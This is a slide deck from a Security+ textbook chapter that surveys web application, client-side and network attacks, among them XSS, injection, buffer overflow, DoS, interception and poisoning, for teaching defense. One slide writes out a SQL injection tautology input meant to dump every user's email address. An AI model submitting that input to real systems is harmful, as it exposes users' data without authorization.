Security Guide to Network Security Fundamentals Fourth Edition

Security+ Guide to Network Security Fundamentals, Fourth Edition Chapter 3 Application and Network Attacks

Objectives • List and explain the different types of Web application attacks • Define client-side attacks • Explain how a buffer overflow attack works • List different types of denial of service attacks • Describe interception and poisoning attacks Security+ Guide to Network Security Fundamentals, Fourth Edition 2

Application Attacks • Attacks that target applications – – Category continues to grow Web application attacks Client-side attacks Buffer overflow attacks • Zero day attacks – Exploit previously unknown vulnerabilities – Victims have no time to prepare or defend Security+ Guide to Network Security Fundamentals, Fourth Edition 3

Web Application Attacks • Web applications an essential element of organizations today • Approach to securing Web applications – Hardening the Web server – Protecting the network Security+ Guide to Network Security Fundamentals, Fourth Edition 4

Figure 3 -1 Web application infrastructure © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 5

Web Application Attacks (cont’d. ) • Common Web application attacks – – Cross-site scripting SQL injection XML injection Command injection / directory traversal Security+ Guide to Network Security Fundamentals, Fourth Edition 6

Figure 3 -2 Web application security © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 7

Cross-Site Scripting (XSS) • Injecting scripts into a Web application server – Directs attacks at clients Figure 3 -3 XSS attacks © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 8

Cross-Site Scripting (cont’d. ) • When victim visits injected Web site: – Malicious instructions sent to victim’s browser • Browser cannot distinguish between valid code and malicious script • Requirements of the targeted Web site – Accepts user input without validation – Uses input in a response without encoding it • Some XSS attacks designed to steal information: – Retained by the browser Security+ Guide to Network Security Fundamentals, Fourth Edition 9

Figure 3 -4 Bookmark page that accepts user input without validating and provides unencoded response © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 10

Figure 3 -5 Input used as response © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 11

SQL Injection • Targets SQL servers by injecting commands • SQL (Structured Query Language) – Used to manipulate data stored in relational database • Forgotten password example – Attacker enters incorrectly formatted e-mail address – Response lets attacker know whether input is being validated Security+ Guide to Network Security Fundamentals, Fourth Edition 12

SQL Injection (cont’d. ) • Forgotten password example (cont’d. ) – Attacker enters email field in SQL statement – Statement processed by the database – Example statement: SELECT fieldlist FROM table WHERE field = ‘whatever’ or ‘a’=‘a’ – Result: All user email addresses will be displayed Security+ Guide to Network Security Fundamentals, Fourth Edition 13

SQL Injection (cont’d. ) Table 3 -1 SQL injection statements • See link Ch 3 f Security+ Guide to Network Security Fundamentals, Fourth Edition 14

XML Injection • Markup language – Method for adding annotations to text • HTML – Uses tags surrounded by brackets – Instructs browser to display text in specific format • XML – Carries data instead of indicating how to display it – No predefined set of tags • Users define their own tags Security+ Guide to Network Security Fundamentals, Fourth Edition 15

XML Injection (cont’d. ) • XML attack – Similar to SQL injection attack – Attacker discovers Web site that does not filter user data – Injects XML tags and data into the database • Xpath injection – Specific type of XML injection attack – Attempts to exploit XML Path Language queries Security+ Guide to Network Security Fundamentals, Fourth Edition 16

Command Injection / Directory Traversal • Web server users typically restricted to root directory • Users may be able to access subdirectories: – But not parallel or higher level directories • Sensitive files to protect from unauthorized user access – Cmd. exe can be used to enter text-based commands – Passwd (Linux) contains user account information Security+ Guide to Network Security Fundamentals, Fourth Edition 17

Command Injection / Directory Traversal (cont’d. ) • Directory traversal attack – Takes advantage of software vulnerability – Attacker moves from root directory to restricted directories • Command injection attack – Attacker enters commands to execute on a server Security+ Guide to Network Security Fundamentals, Fourth Edition 18

Client-Side Attacks • Web application attacks are server-side attacks • Client-side attacks target vulnerabilities in client applications – Interacting with a compromised server – Client initiates connection with server, which could result in an attack Security+ Guide to Network Security Fundamentals, Fourth Edition 19

Client-Side Attacks (cont’d. ) • Drive-by download – Client computer compromised simply by viewing a Web page – Attackers inject content into vulnerable Web server • Gain access to server’s operating system – Attackers craft a zero pixel frame to avoid visual detection – Embed an HTML document inside main document – Client’s browser downloads malicious script – Instructs computer to download malware Security+ Guide to Network Security Fundamentals, Fourth Edition 20

Client-Side Attacks (cont’d. ) • Header manipulation – HTTP header contains fields that characterize data being transmitted – Headers can originate from a Web browser • Browsers do not normally allow this • Attacker’s short program can allow modification • Examples of header manipulation – Referer – Accept-language Security+ Guide to Network Security Fundamentals, Fourth Edition 21

Client-Side Attacks (cont’d. ) • Referer field indicates site that generated the Web page – Attacker can modify this field to hide fact it came from another site – Modified Web page hosted from attacker’s computer • Accept-language – Some Web applications pass contents of this field directly to database – Attacker could inject SQL command by modifying this header Security+ Guide to Network Security Fundamentals, Fourth Edition 22

Client-Side Attacks (cont’d. ) • Cookies and Attachments – Cookies store user-specific information on user’s local computer • Web sites use cookies to identify repeat visitors • Examples of information stored in a cookie – Travel Web sites may store user’s travel itinerary – Personal information provided when visiting a site • Only the Web site that created a cookie can read it Security+ Guide to Network Security Fundamentals, Fourth Edition 23

Client-Side Attacks (cont’d. ) • First-party cookie – Cookie created by Web site user is currently visiting • Third-party cookie – Site advertisers place a cookie to record user preferences • Session cookie – Stored in RAM and expires when browser is closed Security+ Guide to Network Security Fundamentals, Fourth Edition 24

Client-Side Attacks (cont’d. ) • Persistent cookie – Recorded on computer’s hard drive – Does not expire when browser closes • Secure cookie – Used only when browser visits server over secure connection – Always encrypted Security+ Guide to Network Security Fundamentals, Fourth Edition 25

Client-Side Attacks (cont’d. ) • Flash cookie – Uses more memory than traditional cookie – Cannot be deleted through browser configuration settings – See Project 3 -6 to change Flash cookie settings • Cookies pose security and privacy risks – May be stolen and used to impersonate user – Used to tailor advertising – Can be exploited by attackers Security+ Guide to Network Security Fundamentals, Fourth Edition 26

Client-Side Attacks (cont’d. ) • Session hijacking – Attacker attempts to impersonate user by stealing or guessing session token • Malicious add-ons – Browser extensions provide multimedia or interactive Web content – Active X add-ons have several security concerns Security+ Guide to Network Security Fundamentals, Fourth Edition 27

Figure 3 -7 Session hijacking © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 28

Client-Side Attacks (cont’d. ) • Buffer overflow attacks – Process attempts to store data in RAM beyond boundaries of fixed-length storage buffer – Data overflows into adjacent memory locations – May cause computer to stop functioning – Attacker can change “return address” • Redirects to memory address containing malware code Security+ Guide to Network Security Fundamentals, Fourth Edition 29

Figure 3 -8 Buffer overflow attack © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 30

Network Attacks • Denial of service (Do. S) – Attempts to prevent system from performing normal functions – Ping flood attack • Ping utility used to send large number of echo request messages • Overwhelms Web server – Smurf attack • Ping request with originating address changed • Appears as if target computer is asking for response from all computers on the network Security+ Guide to Network Security Fundamentals, Fourth Edition 31

Network Attacks • Denial of service (Do. S) (cont’d. ) – SYN flood attack • Takes advantage of procedures for establishing a connection • Distributed denial of service (DDo. S) – Attacker uses many zombie computers in a botnet to flood a device with requests – Virtually impossible to identify and block source of attack Security+ Guide to Network Security Fundamentals, Fourth Edition 32

Figure 3 -9 SYN flood attack © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 33

Interception • Man-in-the-middle – – Interception of legitimate communication Forging a fictitious response to the sender Passive attack records transmitted data Active attack alters contents of transmission before sending to recipient • Replay attacks – Similar to passive man-in-the-middle attack Security+ Guide to Network Security Fundamentals, Fourth Edition 34

Interception (cont’d. ) • Replay attacks (cont’d. ) – Attacker makes copy of transmission • Uses copy at a later time – Example: capturing logon credentials • More sophisticated replay attacks – Attacker captures network device’s message to server – Later sends original, valid message to server – Establishes trust relationship between attacker and server Security+ Guide to Network Security Fundamentals, Fourth Edition 35

Poisoning • ARP poisoning – Attacker modifies MAC address in ARP cache to point to different computer Table 3 -3 ARP poisoning attack Security+ Guide to Network Security Fundamentals, Fourth Edition 36

Poisoning (cont’d. ) Table 3 -4 Attacks from ARP poisoning Security+ Guide to Network Security Fundamentals, Fourth Edition 37

Poisoning (cont’d. ) • DNS poisoning – Domain Name System is current basis for name resolution to IP address – DNS poisoning substitutes DNS addresses to redirect computer to another device • Two locations for DNS poisoning – Local host table – External DNS server Security+ Guide to Network Security Fundamentals, Fourth Edition 38

Figure 3 -12 DNS poisoning © Cengage Learning 2012 Security+ Guide to Network Security Fundamentals, Fourth Edition 39

Attacks on Access Rights • Privilege escalation – Exploiting software vulnerability to gain access to restricted data – Lower privilege user accesses functions restricted to higher privilege users – User with restricted privilege accesses different restricted privilege of a similar user Security+ Guide to Network Security Fundamentals, Fourth Edition 40

Attacks on Access Rights (cont’d. ) • Transitive access – Attack involving a third party to gain access rights – Has to do with whose credentials should be used when accessing services • Different users have different access rights Security+ Guide to Network Security Fundamentals, Fourth Edition 41